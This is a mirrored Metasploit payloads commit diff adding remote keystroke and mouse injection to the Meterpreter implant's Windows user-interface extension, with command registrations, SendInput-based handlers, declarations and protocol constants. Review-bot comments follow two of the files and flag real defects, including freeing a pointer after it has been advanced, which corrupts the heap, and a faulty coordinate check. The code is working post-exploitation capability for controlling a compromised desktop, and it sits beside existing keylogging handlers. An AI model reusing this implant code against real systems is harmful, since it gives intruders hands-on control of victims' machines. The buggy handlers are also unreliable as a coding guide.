mirror of https://github.com/rapid7/metasploit-payloads synced 2024-12-08 23:33:07 +01:00

Land #339, add keyboard and mouse control

Brent Cook 2019-05-30 14:52:27 -05:00
commit ccdd418ab9
No known key found for this signature in database
GPG Key ID: 1FFAA0B24B708F96
5 changed files with 127 additions and 0 deletions


@ -143,6 +143,8 @@ Command customCommands[] =
COMMAND_REQ("stdapi_ui_desktop_get", request_ui_desktop_get), COMMAND_REQ("stdapi_ui_desktop_get", request_ui_desktop_get),
COMMAND_REQ("stdapi_ui_desktop_set", request_ui_desktop_set), COMMAND_REQ("stdapi_ui_desktop_set", request_ui_desktop_set),
COMMAND_REQ("stdapi_ui_desktop_screenshot", request_ui_desktop_screenshot), COMMAND_REQ("stdapi_ui_desktop_screenshot", request_ui_desktop_screenshot),
COMMAND_REQ("stdapi_ui_send_keys", request_ui_send_keys),
COMMAND_REQ("stdapi_ui_send_mouse", request_ui_send_mouse),
// Event Log // Event Log
COMMAND_REQ("stdapi_sys_eventlog_open", request_sys_eventlog_open), COMMAND_REQ("stdapi_sys_eventlog_open", request_sys_eventlog_open),


@ -350,6 +350,48 @@ DWORD request_ui_get_keys_utf8(Remote *remote, Packet *request)
return ERROR_SUCCESS; return ERROR_SUCCESS;
} }
/*
* Send keystrokes
*/
DWORD request_ui_send_keys(Remote *remote, Packet *request)
{
Packet *response = packet_create_response(request);
DWORD result = ERROR_SUCCESS;
wchar_t *keys = utf8_to_wchar(packet_get_tlv_value_string(request, TLV_TYPE_KEYS_SEND));
if (keys)
{
INPUT input[2] = {0};
input[0].type = INPUT_KEYBOARD;
input[0].ki.time = 0;
input[0].ki.wVk = 0;
input[0].ki.dwExtraInfo = 0;
input[0].ki.dwFlags = KEYEVENTF_UNICODE;
input[1].type = INPUT_KEYBOARD;
input[1].ki.time = 0;
input[1].ki.wVk = 0;
input[1].ki.dwExtraInfo = 0;
input[1].ki.dwFlags = KEYEVENTF_UNICODE | KEYEVENTF_KEYUP;
while (*keys != 0)
{
input[0].ki.wScan = *keys;
input[1].ki.wScan = *keys;
SendInput(2, input, sizeof(INPUT));
keys++;
}
free(keys);
}
else
{
result = 1;
}
// Transmit the response
packet_transmit_response(result, remote, response);
return ERROR_SUCCESS;
}
/* /*
* log keystrokes and track active window * log keystrokes and track active window
*/ */
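Review bot: `free(keys)` in request_ui_send_keys runs after the loop has advanced `keys` to the terminating NUL, so it is handed a pointer into the middle of the buffer returned by utf8_to_wchar instead of its start, which is undefined behaviour and in practice heap corruption. Walk the string with a separate cursor, e.g. `wchar_t *cur = keys;` with `*cur` / `cur++` in the loop, and keep `free(keys)` on the original pointer. The return value of `SendInput` is ignored, so the response reports success even when no events were inserted, and the failure path uses the bare literal `result = 1;` where a named code such as `ERROR_INVALID_PARAMETER` would be clearer. Whether utf8_to_wchar tolerates a NULL from packet_get_tlv_value_string when the TLV is absent is not visible in this section and should be confirmed.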


@ -34,3 +34,79 @@ DWORD request_ui_enable_mouse(Remote *remote, Packet *request)
return ERROR_SUCCESS; return ERROR_SUCCESS;
} }
/*
* Send keystrokes
*/
DWORD request_ui_send_mouse(Remote *remote, Packet *request)
{
Packet *response = packet_create_response(request);
DWORD result = ERROR_SUCCESS;
DWORD action = packet_get_tlv_value_uint(request, TLV_TYPE_MOUSE_ACTION);
DWORD x = packet_get_tlv_value_uint(request, TLV_TYPE_MOUSE_X);
DWORD y = packet_get_tlv_value_uint(request, TLV_TYPE_MOUSE_Y);
INPUT input = {0};
input.type = INPUT_MOUSE;
input.mi.mouseData = 0;
if (action == 0)
{
input.mi.dwFlags = MOUSEEVENTF_MOVE;
}
else if (action == 1)
{
input.mi.dwFlags = MOUSEEVENTF_LEFTDOWN;
}
else if (action == 2)
{
input.mi.dwFlags = MOUSEEVENTF_LEFTDOWN;
}
else if (action == 3)
{
input.mi.dwFlags = MOUSEEVENTF_LEFTUP;
}
else if (action == 4)
{
input.mi.dwFlags = MOUSEEVENTF_RIGHTDOWN;
}
else if (action == 5)
{
input.mi.dwFlags = MOUSEEVENTF_RIGHTDOWN;
}
else if (action == 6)
{
input.mi.dwFlags = MOUSEEVENTF_RIGHTUP;
}
if (x != -1 || y != -1)
{
double width = GetSystemMetrics(SM_CXSCREEN)-1;
double height = GetSystemMetrics(SM_CYSCREEN)-1;
double dx = x*(65535.0f / width);
double dy = y*(65535.0f / height);
input.mi.dx = (LONG)dx;
input.mi.dy = (LONG)dy;
input.mi.dwFlags |= MOUSEEVENTF_ABSOLUTE;
}
SendInput(1, &input, sizeof(INPUT));
if (action == 1)
{
input.mi.dwFlags &= ~(MOUSEEVENTF_LEFTDOWN);
input.mi.dwFlags |= MOUSEEVENTF_LEFTUP;
SendInput(1, &input, sizeof(INPUT));
}
else if (action == 4)
{
input.mi.dwFlags &= ~(MOUSEEVENTF_RIGHTDOWN);
input.mi.dwFlags |= MOUSEEVENTF_RIGHTUP;
SendInput(1, &input, sizeof(INPUT));
}
// Transmit the response
packet_transmit_response(result, remote, response);
return ERROR_SUCCESS;
}
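Review bot: The coordinate guard `if (x != -1 || y != -1)` in request_ui_send_mouse takes the scaling branch when only one of the two is the -1 sentinel, so the DWORD value 0xFFFFFFFF is multiplied by 65535/width and the out-of-range double is cast to LONG; `if (x != (DWORD)-1 && y != (DWORD)-1)` looks like what was intended. x and y are taken straight from the request and never checked against the screen size, and `width` or `height` becomes 0 when GetSystemMetrics returns 1, so a range check before the division is needed. An `action` outside 0–6 leaves `dwFlags` without any move or button bit, yet SendInput is still called and the response reports ERROR_SUCCESS. The header comment still reads `Send keystrokes`; it should describe mouse events, and the action numbers would read better as named constants.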


@ -12,6 +12,9 @@ DWORD request_ui_stop_keyscan(Remote *remote, Packet *request);
DWORD request_ui_get_keys(Remote *remote, Packet *request); DWORD request_ui_get_keys(Remote *remote, Packet *request);
DWORD request_ui_get_keys_utf8(Remote *remote, Packet *request); DWORD request_ui_get_keys_utf8(Remote *remote, Packet *request);
DWORD request_ui_send_keys(Remote *remote, Packet *request);
DWORD request_ui_send_mouse(Remote *remote, Packet *request);
DWORD request_ui_desktop_enum( Remote * remote, Packet * request ); DWORD request_ui_desktop_enum( Remote * remote, Packet * request );
DWORD request_ui_desktop_get( Remote * remote, Packet * request ); DWORD request_ui_desktop_get( Remote * remote, Packet * request );
DWORD request_ui_desktop_set( Remote * remote, Packet * request ); DWORD request_ui_desktop_set( Remote * remote, Packet * request );


@ -187,6 +187,10 @@
#define TLV_TYPE_DESKTOP_SCREENSHOT_PE64DLL_BUFFER MAKE_CUSTOM_TLV( TLV_META_TYPE_STRING, TLV_TYPE_EXTENSION_STDAPI, 3012 ) #define TLV_TYPE_DESKTOP_SCREENSHOT_PE64DLL_BUFFER MAKE_CUSTOM_TLV( TLV_META_TYPE_STRING, TLV_TYPE_EXTENSION_STDAPI, 3012 )
#define TLV_TYPE_KEYSCAN_TRACK_ACTIVE_WINDOW MAKE_CUSTOM_TLV( TLV_META_TYPE_BOOL, TLV_TYPE_EXTENSION_STDAPI, 3013 ) #define TLV_TYPE_KEYSCAN_TRACK_ACTIVE_WINDOW MAKE_CUSTOM_TLV( TLV_META_TYPE_BOOL, TLV_TYPE_EXTENSION_STDAPI, 3013 )
#define TLV_TYPE_KEYS_SEND MAKE_CUSTOM_TLV( TLV_META_TYPE_STRING, TLV_TYPE_EXTENSION_STDAPI, 3014 )
#define TLV_TYPE_MOUSE_ACTION MAKE_CUSTOM_TLV( TLV_META_TYPE_UINT, TLV_TYPE_EXTENSION_STDAPI, 3015 )
#define TLV_TYPE_MOUSE_X MAKE_CUSTOM_TLV( TLV_META_TYPE_UINT, TLV_TYPE_EXTENSION_STDAPI, 3016 )
#define TLV_TYPE_MOUSE_Y MAKE_CUSTOM_TLV( TLV_META_TYPE_UINT, TLV_TYPE_EXTENSION_STDAPI, 3017 )
// Event Log // Event Log
#define TLV_TYPE_EVENT_SOURCENAME MAKE_CUSTOM_TLV( TLV_META_TYPE_STRING, TLV_TYPE_EXTENSION_STDAPI, 4000 ) #define TLV_TYPE_EVENT_SOURCENAME MAKE_CUSTOM_TLV( TLV_META_TYPE_STRING, TLV_TYPE_EXTENSION_STDAPI, 4000 )